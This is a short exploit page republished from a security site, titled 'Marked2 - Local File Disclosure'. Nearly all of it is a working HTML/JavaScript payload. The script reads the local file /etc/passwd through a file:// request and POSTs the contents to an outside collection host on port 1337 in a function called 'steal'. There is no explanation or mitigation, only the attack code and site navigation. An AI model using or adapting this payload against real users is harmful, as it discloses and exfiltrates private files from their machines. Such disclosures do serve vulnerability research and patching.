|
Marked2 - Local File Disclosure
|
|
来源:vfocus.net 作者:CorbenLeo 发布时间:2018-02-11
|
|
<body>
<script>
var file = "file:///etc/passwd";
var extract = "http://dev.example.com:1337/";
function get(url) {
var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", url, false);
xmlHttp.send(null);
return xmlHttp.responseText;
}
function steal(data) {
var xhr = new XMLHttpRequest();
xhr.open('POST', extract, true);
xhr.onload = function() {};
xhr.send(data);
}
var cdl = get(file);
steal(cdl);
</script>
</body>
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
